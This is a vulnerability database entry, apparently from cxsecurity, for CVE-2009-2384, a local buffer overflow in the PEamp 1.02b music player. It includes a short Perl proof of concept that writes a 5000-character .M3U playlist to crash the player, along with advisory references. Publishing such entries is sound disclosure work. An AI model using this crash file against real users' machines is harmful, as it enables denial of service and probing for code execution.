Bug: PEamp 1.02b (.M3U File) Local Buffer Overflow PoC (WLB-2009070122 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: PEamp 1.02b (.M3U File) Local Buffer Overflow PoC
 Credit: ThE g0bL!N
 Date: 2009.07.11
 CWE: CWE-119 (Show similar)
 CVE: CVE-2009-2384 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
Yes
No

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # PEamp 1.02b (.M3U File) Local Stack Overflow POC ##
# # Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)

References:

http://xforce.iss.net/xforce/xfdb/51479
http://www.milw0rm.com/exploits/9061
http://secunia.com/advisories/35663

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com